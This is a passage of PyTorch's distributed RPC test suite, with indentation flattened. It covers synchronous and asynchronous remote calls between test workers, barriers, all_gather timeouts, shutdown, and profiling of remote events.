def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
def _run_uneven_workload(self, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def test_wait_all_workers(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This tests validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload()
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with torch.autograd.profiler.profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with torch.autograd.profiler.profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with torch.autograd.profiler.profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@single_threaded_process_group_agent
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with torch.autograd.profiler.profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@single_threaded_process_group_agent
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with torch.autograd.profiler.profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with torch.autograd.profiler.profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with torch.autograd.profiler.profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with torch.autograd.profiler.profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with torch.autograd.profiler.profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with torch.autograd.profiler.profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
